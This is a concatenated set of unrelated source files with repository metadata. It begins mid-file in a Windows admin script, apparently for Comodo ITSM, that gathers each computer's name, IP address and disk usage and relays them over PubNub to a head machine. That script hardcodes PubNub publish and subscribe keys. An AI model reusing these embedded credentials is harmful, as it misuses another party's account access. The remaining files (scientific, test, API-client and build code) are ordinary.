self.old_value = ctypes.c_long()
self.success = self._disable(ctypes.byref(self.old_value))
def __exit__(self, type, value, traceback):
if self.success:
self._revert(self.old_value)
def runvbs(vbs):
workdir=os.environ['PROGRAMDATA']+r'\temp'
if not os.path.isdir(workdir):
os.mkdir(workdir)
with open(workdir+r'\temprun.vbs',"w") as f :
f.write(vbs)
with disable_file_system_redirection():
Percentage=os.popen('cscript.exe "'+workdir+r'\temprun.vbs"').read()
if os.path.isfile(workdir+r'\temprun.vbs'):
os.remove(workdir+r'\temprun.vbs')
return Percentage
def Drive(KEY):
SAM=[]
per=[]
percent=runvbs(vbs)
SAM.append(KEY)
SAM.append(computername())
SAM.append(ipaddress())
freepercent=re.findall('DRIVE (.*)',percent)
for val in freepercent:
val1=re.sub(r":(.*)", "", val)
val=re.sub(r"(.*):", "", val)
val=re.sub(r"%", "", val)
val=float(val)
freepercentage=100-val
per.append(str(freepercentage))
drive=os.popen('wmic logicaldisk WHERE DriveType=3 get name').read()
list_of_drives=drive.split()[1:]
def disk_usage(path):
_, total, free = ctypes.c_ulonglong(), ctypes.c_ulonglong(), \
ctypes.c_ulonglong()
if sys.version_info >= (3,) or isinstance(path, unicode):
fun = ctypes.windll.kernel32.GetDiskFreeSpaceExW
else:
fun = ctypes.windll.kernel32.GetDiskFreeSpaceExA
ret = fun(path, ctypes.byref(_), ctypes.byref(total), ctypes.byref(free))
if ret == 0:
raise ctypes.WinError()
used = total.value - free.value
return [total.value, used, free.value]
def bytes2human(n):
symbols = ('KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB')
prefix = {}
for i, s in enumerate(symbols):
prefix[s] = 1 << (i+1)*10
for s in reversed(symbols):
if n >= prefix[s]:
value = float(n) / prefix[s]
return '%.1f%s' % (value, s)
return n
k=[disk_usage(i) for i in list_of_drives]
fnl=[]
for i in k:
for j in i:
SAM.append(bytes2human(j))
j=3
for i in list_of_drives:
SAM.insert(j,i)
j=j+4
j=7
for i in per:
SAM.insert(j,i)
j=j+5
print SAM
if len(SAM)>=8:
j=8
for i in per:
SAM.insert(j,"\n"+",")
j=j+6
else:
j=8
SAM.insert(j,"\n")
return SAM
list_head=['Computer_Name', 'IP_Address',"Drive_name","Total_Space","Used_Space","Free_Space","Percentage_of_usage"]
def publish_nonhead():
import time
time.sleep(30)
from pubnub.pnconfiguration import PNConfiguration
from pubnub.pubnub import PubNub
from pubnub.callbacks import SubscribeCallback
from pubnub.pnconfiguration import PNConfiguration
from pubnub.pubnub import PubNub
publish_key1= 'pub-c-7a797a24-388e-411c-b848-9bd170919784'
subscribe_key1= 'sub-c-b1b31f80-179a-11e8-95aa-1eb18890f15d'
pnconfig = PNConfiguration()
pnconfig.subscribe_key = subscribe_key1
pnconfig.publish_key = publish_key1
pnconfig.ssl = True
pubnub = PubNub(pnconfig)
import time
from pubnub.exceptions import PubNubException
try:
envelope = pubnub.publish().channel("Channel-706fxzjkv").message(Drive(KEY)).sync()
print("publish timetoken: %d" % envelope.result.timetoken)
except PubNubException as e:
print e
def publish(no):
import pubnub
from pubnub.pnconfiguration import PNConfiguration
from pubnub.pubnub import PubNub
from pubnub.callbacks import SubscribeCallback
from pubnub.pnconfiguration import PNConfiguration
from pubnub.pubnub import PubNub
publish_key1= 'pub-c-7a797a24-388e-411c-b848-9bd170919784'
subscribe_key1= 'sub-c-b1b31f80-179a-11e8-95aa-1eb18890f15d'
pnconfig = PNConfiguration()
pnconfig.subscribe_key = subscribe_key1
pnconfig.publish_key = publish_key1
pnconfig.ssl = True
pubnub = PubNub(pnconfig)
import time
s=3*no
time.sleep(s)
from pubnub.exceptions import PubNubException
try:
envelope = pubnub.publish().channel("Channel-706fxzjkv").message(Drive(KEY)).sync()
print("publish timetoken: %d" % envelope.result.timetoken)
app_process=os.getpid()
app_process=str(app_process)
import subprocess;
import ctypes
class disable_file_system_redirection:
_disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection
_revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection
def __enter__(self):
self.old_value = ctypes.c_long()
self.success = self._disable(ctypes.byref(self.old_value))
def __exit__(self, type, value, traceback):
if self.success:
self._revert(self.old_value)
time.sleep(5)
reportfolder=os.path.join(os.environ['ProgramData'],"new.csv")
Email(reportfolder,emailto)
print "Your file is in head computer at "+reportfolder
with disable_file_system_redirection():
process=subprocess.Popen(['taskkill', '/F','/PID',app_process],shell=True,stdout=subprocess.PIPE);
result=process.communicate()[0]
print (result)
except PubNubException as e:
print e
class LongFunctionInside(object):
lock_state = threading.Lock()
working = False
def long_function(self, timeout,no):
self.working = True
timeout_work = threading.Thread(name="thread_name", target=self.work_time, args=(timeout,))
timeout_work.setDaemon(True)
timeout_work.start()
import logging
import pubnub
from pubnub.exceptions import PubNubException
from pubnub.pnconfiguration import PNConfiguration
from pubnub.pubnub import PubNub, SubscribeListener
import time
import os
pnconfig = PNConfiguration()
pnconfig.subscribe_key = 'sub-c-b1b31f80-179a-11e8-95aa-1eb18890f15d'
pnconfig.publish_key = ''
pubnub = PubNub(pnconfig)
n=0
my_listener = SubscribeListener()
pubnub.subscribe().channels('Channel-706fxzjkv').execute()
fp=os.path.join(os.environ['ProgramData'],"new.csv")
sample=''
for i in list_head:
if i == None:
sample=sample+"None"+","
else:
sample=sample+i+","
with open(fp,'w') as f:
f.write(sample)
f.write('\n')
while True:
print "Listening..."# endless/long work
pubnub.add_listener(my_listener)
result = my_listener.wait_for_message_on('Channel-706fxzjkv')
pubnub.remove_listener(my_listener)
result=result.message
print result[0]
sample=""
if(result[0]==KEY):
with open(fp,'a+') as f:
for i in range(1,len(result)):
if result[i] == None:
sample=sample+"None"+","
else:
sample=sample+result[i]+","
f.write(sample)
f.write('\n')
if not self.working: # if state is working == true still working
break
self.set_state(True)
def work_time(self, sleep_time):
print sleep_time# thread function that just sleeping specified time,
time.sleep(sleep_time)
if self.working:
publish(no)
self.set_state(False)
def set_state(self, state): # secured state change
while True:
self.lock_state.acquire()
try:
self.working = state
break
finally:
self.lock_state.release()
HOMEPATH = r"C:\Program Files (x86)"
if os.path.exists(HOMEPATH):
HOMEPATH = r"C:\Program Files (x86)"
else:
HOMEPATH =r"C:\Program Files"
fp=os.path.join(os.environ['ProgramData'],"new.csv")
if os.path.exists(fp):
try:
os.remove(fp)
except:
pass
DEST= os.path.join(HOMEPATH,r'COMODO\Comodo ITSM\Lib\site-packages')
Folders=os.listdir(DEST)
Nodow=0
Del_folders=['certifi', 'certifi-2018.1.18.dist-info','chardet', 'chardet-3.0.4.dist-info', 'Cryptodome', 'pubnub', 'pubnub-4.0.13.dist-info', 'pycryptodomex-3.4.12.dist-info','requests']
for i in Del_folders:
if i in Folders:
Nodow=Nodow+1
if Nodow>7:
c=0
else:
DEST=Import_pubnub(DEST)
computer=os.environ['computername']
import os
if computer==Head_computer :
lw = LongFunctionInside()
lw.long_function(0.1,no)
else:
publish_nonhead()
| [
"[email protected]"
] | |
171eaf38d54a5fe7dcf2a23a97cf6c845c890e8d | cff5ac961d717059caf25dc4247ddcc958f27d24 | /WRAPPERS/corrmat_from_regionalmeasures.py | 1be8e37d8ef4eb4850aaa0156d84101d217d6c98 | [
"MIT"
] | permissive | repropaper/NSPN_WhitakerVertes_PNAS2016 | fac4a9bb72e92db2d38b5c41e431e998c8114030 | 5c9c46caf91768d4cadec2b24078b640f05d3d76 | refs/heads/reprobranch | 2020-03-19T00:17:24.346727 | 2017-02-23T08:24:50 | 2017-02-23T08:24:50 | 135,469,739 | 0 | 1 | MIT | 2018-05-30T17:08:00 | 2018-05-30T16:26:32 | OpenEdge ABL | UTF-8 | Python | false | false | 6,687 | py | #!/usr/bin/env python
#=============================================================================
# Created by Kirstie Whitaker
# at Hot Numbers coffee shop on Trumpington Road in Cambridge, September 2016
# Contact: [email protected]
#=============================================================================
#=============================================================================
# IMPORTS
#=============================================================================
import os
import sys
import argparse
import textwrap
import numpy as np
import pandas as pd
sys.path.append(os.path.join(os.path.dirname(__file__), '../SCRIPTS/'))
import make_corr_matrices as mcm
#=============================================================================
# FUNCTIONS
#=============================================================================
def setup_argparser():
'''
Code to read in arguments from the command line
Also allows you to change some settings
'''
# Build a basic parser.
help_text = (('Generate a structural correlation matrix from an input csv file,\n')+
('a list of region names and (optional) covariates.'))
sign_off = 'Author: Kirstie Whitaker <[email protected]>'
parser = argparse.ArgumentParser(description=help_text,
epilog=sign_off,
formatter_class=argparse.RawTextHelpFormatter)
# Now add the arguments
parser.add_argument(dest='regional_measures_file',
type=str,
metavar='regional_measures_file',
help=textwrap.dedent(('CSV file that contains regional values for each participant.\n')+
('Column labels should be the region names or covariate variable\n')+
('names. All participants in the file will be included in the\n')+
('correlation matrix.')))
parser.add_argument(dest='names_file',
type=str,
metavar='names_file',
help=textwrap.dedent(('Text file that contains the names of each region to be included\n')+
('in the correlation matrix. One region name on each line.')))
parser.add_argument(dest='output_name',
type=str,
metavar='output_name',
help=textwrap.dedent(('File name of the output correlation matrix.\n')+
('If the output directory does not yet exist it will be created.')))
parser.add_argument('--covars_file',
type=str,
metavar='covars_file',
help=textwrap.dedent(('Text file that contains the names of variables that should be\n')+
('covaried for each regional measure before the creation of the\n')+
('correlation matrix. One variable name on each line.\n')+
(' Default: None')),
default=None)
parser.add_argument('--names_308_style',
action='store_true',
help=textwrap.dedent(('Include this flag if your names are in the NSPN 308\n')+
('parcellation style (which means you have 41 subcortical regions)\n')+
('that are still in the names files and that\n')+
('the names are in <hemi>_<DK-region>_<part> format.\n')+
(' Default: False')),
default=False)
arguments = parser.parse_args()
return arguments, parser
def read_in_data(regional_measures_file, names_file, covars_file=None, names_308_style=True):
'''
Read in the data from the three input files:
* regional_measures_file
* names_file
* covars_file
If the names are in 308 style then drop the first 41 entries from the names
and covars files
'''
# Load the input files
df = pd.read_csv(regional_measures_file)
names = [ line.strip() for line in open(names_file) ]
if covars_file:
covars_list = [ line.strip() for line in open(covars_file) ]
else:
covars_list = []
# If you have your names in names_308_style you need to strip the
# first 41 items
if names_308_style:
names = names[41:]
# You may also have to strip the words "thickness" from the
# end of the names in the data frame
if names_308_style:
df.columns = [ col.rsplit('_thickness', 1)[0] for col in df.columns ]
return df, names, covars_list
def corrmat_from_regionalmeasures(regional_measures_file,
names_file,
covars_file,
output_name,
names_308_style=False):
'''
This is the big function!
It reads in the CSV file that contains the regional measures for each
participant, the names file and the list of covariates.
Then it creates the correlation matrix and writes it out to the output_dir
as a txt file.
'''
# Read in the data
df, names, covars_list = read_in_data(regional_measures_file,
names_file,
covars_file=covars_file,
names_308_style=names_308_style)
# Make your correlation matrix correcting for all the covariates
M = mcm.create_corrmat(df, names, covars_list)
# Save the corrmat
mcm.save_mat(M, output_name)
if __name__ == "__main__":
# Read in the command line arguments
arg, parser = setup_argparser()
# Now run the main function :)
corrmat_from_regionalmeasures(arg.regional_measures_file,
arg.names_file,
arg.covars_file,
arg.output_name,
names_308_style=arg.names_308_style)
#=============================================================================
# Wooo! All done :)
#=============================================================================
| [
"[email protected]"
] | |
a0264de9f564b1eddb8d60d387ccf898539bcc2f | c544a5c24b4adedd2c1602894acf5dcafe64ed6f | /astropy_helpers/tests/test_utils.py | ad76e4f5b54a24cc076aaa835620bb1827d6aac3 | [] | permissive | astropy/astropy-helpers | b6053f673f517e11ccf243d1ffe1e685b9b8ebe7 | 3b45ed3191ceb45c574db304ec0f33282d2e4a98 | refs/heads/master | 2023-08-20T04:51:42.767065 | 2022-05-25T16:38:43 | 2022-05-25T16:38:43 | 14,448,779 | 30 | 40 | BSD-3-Clause | 2022-05-25T16:36:17 | 2013-11-16T15:01:42 | Python | UTF-8 | Python | false | false | 751 | py | import os
from ..utils import find_data_files
def test_find_data_files(tmpdir):
data = tmpdir.mkdir('data')
sub1 = data.mkdir('sub1')
sub2 = data.mkdir('sub2')
sub3 = sub1.mkdir('sub3')
for directory in (data, sub1, sub2, sub3):
filename = directory.join('data.dat').strpath
with open(filename, 'w') as f:
f.write('test')
filenames = find_data_files(data.strpath, '**/*.dat')
filenames = sorted(os.path.relpath(x, data.strpath) for x in filenames)
assert filenames[0] == os.path.join('data.dat')
assert filenames[1] == os.path.join('sub1', 'data.dat')
assert filenames[2] == os.path.join('sub1', 'sub3', 'data.dat')
assert filenames[3] == os.path.join('sub2', 'data.dat')
| [
"[email protected]"
] | |
228b3233ec8da4230a696814daf44cbb9a316673 | 6657a43ee360177e578f67cf966e6aef5debda3c | /varsom_avalanche_client/configuration.py | 4f8c074c8e547f5533c6988b72af1a1db6d5d8c1 | [
"MIT"
] | permissive | NVE/python-varsom-avalanche-client | 3cc8b9c366f566a99c6f309ccdfb477f73256659 | c7787bf070d8ea91efd3a2a9e7782eedd4961528 | refs/heads/master | 2022-04-20T09:32:24.499284 | 2020-04-16T20:12:01 | 2020-04-16T20:12:01 | 256,318,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,046 | py | # coding: utf-8
"""
Snøskredvarsel API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v5.0.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import copy
import logging
import multiprocessing
import sys
import urllib3
import six
from six.moves import http_client as httplib
class TypeWithDefault(type):
def __init__(cls, name, bases, dct):
super(TypeWithDefault, cls).__init__(name, bases, dct)
cls._default = None
def __call__(cls):
if cls._default is None:
cls._default = type.__call__(cls)
return copy.copy(cls._default)
def set_default(cls, default):
cls._default = copy.copy(default)
class Configuration(six.with_metaclass(TypeWithDefault, object)):
"""NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
"""
def __init__(self):
"""Constructor"""
# Default Base url
self.host = "https://api01.nve.no/hydrology/forecast/avalanche/v5.0.1"
# Temp file folder for downloading files
self.temp_folder_path = None
# Authentication Settings
# dict to store API key(s)
self.api_key = {}
# dict to store API prefix (e.g. Bearer)
self.api_key_prefix = {}
# function to refresh API key if expired
self.refresh_api_key_hook = None
# Username for HTTP basic authentication
self.username = ""
# Password for HTTP basic authentication
self.password = ""
# Logging Settings
self.logger = {}
self.logger["package_logger"] = logging.getLogger("varsom_avalanche_client")
self.logger["urllib3_logger"] = logging.getLogger("urllib3")
# Log format
self.logger_format = '%(asctime)s %(levelname)s %(message)s'
# Log stream handler
self.logger_stream_handler = None
# Log file handler
self.logger_file_handler = None
# Debug file location
self.logger_file = None
# Debug switch
self.debug = False
# SSL/TLS verification
# Set this to false to skip verifying SSL certificate when calling API
# from https server.
self.verify_ssl = True
# Set this to customize the certificate file to verify the peer.
self.ssl_ca_cert = None
# client certificate file
self.cert_file = None
# client key file
self.key_file = None
# Set this to True/False to enable/disable SSL hostname verification.
self.assert_hostname = None
# urllib3 connection pool's maximum number of connections saved
# per pool. urllib3 uses 1 connection as default value, but this is
# not the best value when you are making a lot of possibly parallel
# requests to the same host, which is often the case here.
# cpu_count * 5 is used as default value to increase performance.
self.connection_pool_maxsize = multiprocessing.cpu_count() * 5
# Proxy URL
self.proxy = None
# Safe chars for path_param
self.safe_chars_for_path_param = ''
@property
def logger_file(self):
"""The logger file.
If the logger_file is None, then add stream handler and remove file
handler. Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
return self.__logger_file
@logger_file.setter
def logger_file(self, value):
"""The logger file.
If the logger_file is None, then add stream handler and remove file
handler. Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
self.__logger_file = value
if self.__logger_file:
# If set logging file,
# then add file handler and remove stream handler.
self.logger_file_handler = logging.FileHandler(self.__logger_file)
self.logger_file_handler.setFormatter(self.logger_formatter)
for _, logger in six.iteritems(self.logger):
logger.addHandler(self.logger_file_handler)
if self.logger_stream_handler:
logger.removeHandler(self.logger_stream_handler)
else:
# If not set logging file,
# then add stream handler and remove file handler.
self.logger_stream_handler = logging.StreamHandler()
self.logger_stream_handler.setFormatter(self.logger_formatter)
for _, logger in six.iteritems(self.logger):
logger.addHandler(self.logger_stream_handler)
if self.logger_file_handler:
logger.removeHandler(self.logger_file_handler)
@property
def debug(self):
"""Debug status
:param value: The debug status, True or False.
:type: bool
"""
return self.__debug
@debug.setter
def debug(self, value):
"""Debug status
:param value: The debug status, True or False.
:type: bool
"""
self.__debug = value
if self.__debug:
# if debug status is True, turn on debug logging
for _, logger in six.iteritems(self.logger):
logger.setLevel(logging.DEBUG)
# turn on httplib debug
httplib.HTTPConnection.debuglevel = 1
else:
# if debug status is False, turn off debug logging,
# setting log level to default `logging.WARNING`
for _, logger in six.iteritems(self.logger):
logger.setLevel(logging.WARNING)
# turn off httplib debug
httplib.HTTPConnection.debuglevel = 0
@property
def logger_format(self):
"""The logger format.
The logger_formatter will be updated when sets logger_format.
:param value: The format string.
:type: str
"""
return self.__logger_format
@logger_format.setter
def logger_format(self, value):
"""The logger format.
The logger_formatter will be updated when sets logger_format.
:param value: The format string.
:type: str
"""
self.__logger_format = value
self.logger_formatter = logging.Formatter(self.__logger_format)
def get_api_key_with_prefix(self, identifier):
"""Gets API key (with prefix if set).
:param identifier: The identifier of apiKey.
:return: The token for api key authentication.
"""
if self.refresh_api_key_hook:
self.refresh_api_key_hook(self)
key = self.api_key.get(identifier)
if key:
prefix = self.api_key_prefix.get(identifier)
if prefix:
return "%s %s" % (prefix, key)
else:
return key
def get_basic_auth_token(self):
"""Gets HTTP basic authentication header (string).
:return: The token for basic HTTP authentication.
"""
return urllib3.util.make_headers(
basic_auth=self.username + ':' + self.password
).get('authorization')
def auth_settings(self):
"""Gets Auth Settings dict for api client.
:return: The Auth Settings information dict.
"""
return {
}
def to_debug_report(self):
"""Gets the essential information for debugging.
:return: The report for debugging.
"""
return "Python SDK Debug Report:\n"\
"OS: {env}\n"\
"Python Version: {pyversion}\n"\
"Version of the API: v5.0.1\n"\
"SDK Package Version: 1.0.0".\
format(env=sys.platform, pyversion=sys.version)
| [
"[email protected]"
] | |
7d5314a98029672f01fe722b58e29b81bd0a8f69 | 9dc5c9dd8bff75a17eb27c75a85f85f1515efbe1 | /examples/competitive/sofm_compare_grid_types.py | 4f33caf37872c3184f5a4581bd45137fb39d3099 | [
"MIT"
] | permissive | BickyMz/neupy | 667a688a3f1f3c9c515376eb2fc32446185230a9 | 3ceb25d3b9f6c00c0b25ef65a25434126006098d | refs/heads/master | 2020-05-24T16:25:03.803826 | 2019-05-05T12:55:46 | 2019-05-05T12:55:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,443 | py | import matplotlib.pyplot as plt
from neupy import algorithms, utils
from helpers import plot_2d_grid, make_circle
plt.style.use('ggplot')
utils.reproducible()
if __name__ == '__main__':
GRID_WIDTH = 10
GRID_HEIGHT = 10
configurations = [{
'grid_type': 'hexagon',
'use_hexagon_grid': True,
'title': 'Using hexagon grid',
}, {
'grid_type': 'rect',
'use_hexagon_grid': False,
'title': 'Using regcangular grid',
}]
data = make_circle()
red, blue = ('#E24A33', '#348ABD')
n_columns = len(configurations)
plt.figure(figsize=(12, 5))
for index, conf in enumerate(configurations, start=1):
sofm = algorithms.SOFM(
n_inputs=2,
features_grid=(GRID_HEIGHT, GRID_WIDTH),
verbose=True,
shuffle_data=True,
grid_type=conf['grid_type'],
learning_radius=8,
reduce_radius_after=5,
std=2,
reduce_std_after=5,
step=0.3,
reduce_step_after=5,
)
sofm.train(data, epochs=40)
plt.subplot(1, n_columns, index)
plt.title(conf['title'])
plt.scatter(*data.T, color=blue, alpha=0.05)
plt.scatter(*sofm.weight, color=red)
weights = sofm.weight.reshape((2, GRID_HEIGHT, GRID_WIDTH))
plot_2d_grid(weights, color=red, hexagon=conf['use_hexagon_grid'])
plt.show()
| [
"[email protected]"
] | |
0e28eda07956ac5acd87b7c0d705815ef5658849 | aa1972e6978d5f983c48578bdf3b51e311cb4396 | /nitro-python-1.0/nssrc/com/citrix/netscaler/nitro/resource/config/cs/csvserver_feopolicy_binding.py | acb178fbe6eab499c4161045696cebc885acad74 | [
"Python-2.0",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | MayankTahil/nitro-ide | 3d7ddfd13ff6510d6709bdeaef37c187b9f22f38 | 50054929214a35a7bb19ed10c4905fffa37c3451 | refs/heads/master | 2020-12-03T02:27:03.672953 | 2017-07-05T18:09:09 | 2017-07-05T18:09:09 | 95,933,896 | 2 | 5 | null | 2017-07-05T16:51:29 | 2017-07-01T01:03:20 | HTML | UTF-8 | Python | false | false | 11,337 | py | #
# Copyright (c) 2008-2016 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class csvserver_feopolicy_binding(base_resource) :
""" Binding class showing the feopolicy that can be bound to csvserver.
"""
def __init__(self) :
self._policyname = None
self._priority = None
self._gotopriorityexpression = None
self._bindpoint = None
self._name = None
self._targetlbvserver = None
self._invoke = None
self._labeltype = None
self._labelname = None
self.___count = 0
@property
def priority(self) :
r"""Priority for the policy.
"""
try :
return self._priority
except Exception as e:
raise e
@priority.setter
def priority(self, priority) :
r"""Priority for the policy.
"""
try :
self._priority = priority
except Exception as e:
raise e
@property
def bindpoint(self) :
r"""The bindpoint to which the policy is bound.<br/>Possible values = REQUEST, RESPONSE.
"""
try :
return self._bindpoint
except Exception as e:
raise e
@bindpoint.setter
def bindpoint(self, bindpoint) :
r"""The bindpoint to which the policy is bound.<br/>Possible values = REQUEST, RESPONSE
"""
try :
self._bindpoint = bindpoint
except Exception as e:
raise e
@property
def policyname(self) :
r"""Policies bound to this vserver.
"""
try :
return self._policyname
except Exception as e:
raise e
@policyname.setter
def policyname(self, policyname) :
r"""Policies bound to this vserver.
"""
try :
self._policyname = policyname
except Exception as e:
raise e
@property
def labelname(self) :
r"""Name of the label to be invoked.
"""
try :
return self._labelname
except Exception as e:
raise e
@labelname.setter
def labelname(self, labelname) :
r"""Name of the label to be invoked.
"""
try :
self._labelname = labelname
except Exception as e:
raise e
@property
def name(self) :
r"""Name of the content switching virtual server to which the content switching policy applies.<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
r"""Name of the content switching virtual server to which the content switching policy applies.<br/>Minimum length = 1
"""
try :
self._name = name
except Exception as e:
raise e
@property
def targetlbvserver(self) :
r"""Name of the Load Balancing virtual server to which the content is switched, if policy rule is evaluated to be TRUE.
Example: bind cs vs cs1 -policyname pol1 -priority 101 -targetLBVserver lb1
Note: Use this parameter only in case of Content Switching policy bind operations to a CS vserver.
"""
try :
return self._targetlbvserver
except Exception as e:
raise e
@targetlbvserver.setter
def targetlbvserver(self, targetlbvserver) :
r"""Name of the Load Balancing virtual server to which the content is switched, if policy rule is evaluated to be TRUE.
Example: bind cs vs cs1 -policyname pol1 -priority 101 -targetLBVserver lb1
Note: Use this parameter only in case of Content Switching policy bind operations to a CS vserver
"""
try :
self._targetlbvserver = targetlbvserver
except Exception as e:
raise e
@property
def gotopriorityexpression(self) :
r"""Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.
"""
try :
return self._gotopriorityexpression
except Exception as e:
raise e
@gotopriorityexpression.setter
def gotopriorityexpression(self, gotopriorityexpression) :
r"""Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.
"""
try :
self._gotopriorityexpression = gotopriorityexpression
except Exception as e:
raise e
@property
def invoke(self) :
r"""Invoke a policy label if this policy's rule evaluates to TRUE (valid only for default-syntax policies such as application firewall, transform, integrated cache, rewrite, responder, and content switching).
"""
try :
return self._invoke
except Exception as e:
raise e
@invoke.setter
def invoke(self, invoke) :
r"""Invoke a policy label if this policy's rule evaluates to TRUE (valid only for default-syntax policies such as application firewall, transform, integrated cache, rewrite, responder, and content switching).
"""
try :
self._invoke = invoke
except Exception as e:
raise e
@property
def labeltype(self) :
r"""Type of label to be invoked.
"""
try :
return self._labeltype
except Exception as e:
raise e
@labeltype.setter
def labeltype(self, labeltype) :
r"""Type of label to be invoked.
"""
try :
self._labeltype = labeltype
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
r""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(csvserver_feopolicy_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.csvserver_feopolicy_binding
except Exception as e :
raise e
def _get_object_name(self) :
r""" Returns the value of object identifier argument
"""
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
try :
if resource and type(resource) is not list :
updateresource = csvserver_feopolicy_binding()
updateresource.name = resource.name
updateresource.policyname = resource.policyname
updateresource.targetlbvserver = resource.targetlbvserver
updateresource.priority = resource.priority
updateresource.gotopriorityexpression = resource.gotopriorityexpression
updateresource.bindpoint = resource.bindpoint
updateresource.invoke = resource.invoke
updateresource.labeltype = resource.labeltype
updateresource.labelname = resource.labelname
return updateresource.update_resource(client)
else :
if resource and len(resource) > 0 :
updateresources = [csvserver_feopolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].name = resource[i].name
updateresources[i].policyname = resource[i].policyname
updateresources[i].targetlbvserver = resource[i].targetlbvserver
updateresources[i].priority = resource[i].priority
updateresources[i].gotopriorityexpression = resource[i].gotopriorityexpression
updateresources[i].bindpoint = resource[i].bindpoint
updateresources[i].invoke = resource[i].invoke
updateresources[i].labeltype = resource[i].labeltype
updateresources[i].labelname = resource[i].labelname
return cls.update_bulk_request(client, updateresources)
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
try :
if resource and type(resource) is not list :
deleteresource = csvserver_feopolicy_binding()
deleteresource.name = resource.name
deleteresource.policyname = resource.policyname
deleteresource.bindpoint = resource.bindpoint
deleteresource.priority = resource.priority
return deleteresource.delete_resource(client)
else :
if resource and len(resource) > 0 :
deleteresources = [csvserver_feopolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i].name
deleteresources[i].policyname = resource[i].policyname
deleteresources[i].bindpoint = resource[i].bindpoint
deleteresources[i].priority = resource[i].priority
return cls.delete_bulk_request(client, deleteresources)
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
r""" Use this API to fetch csvserver_feopolicy_binding resources.
"""
try :
if not name :
obj = csvserver_feopolicy_binding()
response = obj.get_resources(service, option_)
else :
obj = csvserver_feopolicy_binding()
obj.name = name
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, name, filter_) :
r""" Use this API to fetch filtered set of csvserver_feopolicy_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = csvserver_feopolicy_binding()
obj.name = name
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, name) :
r""" Use this API to count csvserver_feopolicy_binding resources configued on NetScaler.
"""
try :
obj = csvserver_feopolicy_binding()
obj.name = name
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, name, filter_) :
r""" Use this API to count the filtered set of csvserver_feopolicy_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = csvserver_feopolicy_binding()
obj.name = name
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class Bindpoint:
REQUEST = "REQUEST"
RESPONSE = "RESPONSE"
class Labeltype:
reqvserver = "reqvserver"
resvserver = "resvserver"
policylabel = "policylabel"
class csvserver_feopolicy_binding_response(base_response) :
def __init__(self, length=1) :
self.csvserver_feopolicy_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.csvserver_feopolicy_binding = [csvserver_feopolicy_binding() for _ in range(length)]
| [
"[email protected]"
] | |
277892508b145e197f2e8e451e059b45ae7d1432 | 0b64e696083d567ed18e6366d8bd8e99733e1485 | /node_modules/socket.io/node_modules/redis/node_modules/hiredis/build/c4che/Release.cache.py | 760ac556fb84b9aa1a219e95c3e78caf69dbbc15 | [
"MIT"
] | permissive | iambibhas/myn3 | 340286d56edcde4ad024b63f0b12e1ecb7c6b15f | 994c2850ac76920289004dc67f46bcedf7e652dc | refs/heads/master | 2021-01-01T05:53:35.376823 | 2012-09-24T20:20:16 | 2012-09-24T20:20:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,449 | py | AR = '/usr/bin/ar'
ARFLAGS = 'rcs'
CCFLAGS = ['-g']
CCFLAGS_MACBUNDLE = ['-fPIC']
CCFLAGS_NODE = ['-D_LARGEFILE_SOURCE', '-D_FILE_OFFSET_BITS=64']
CC_VERSION = ('4', '6', '3')
COMPILER_CXX = 'g++'
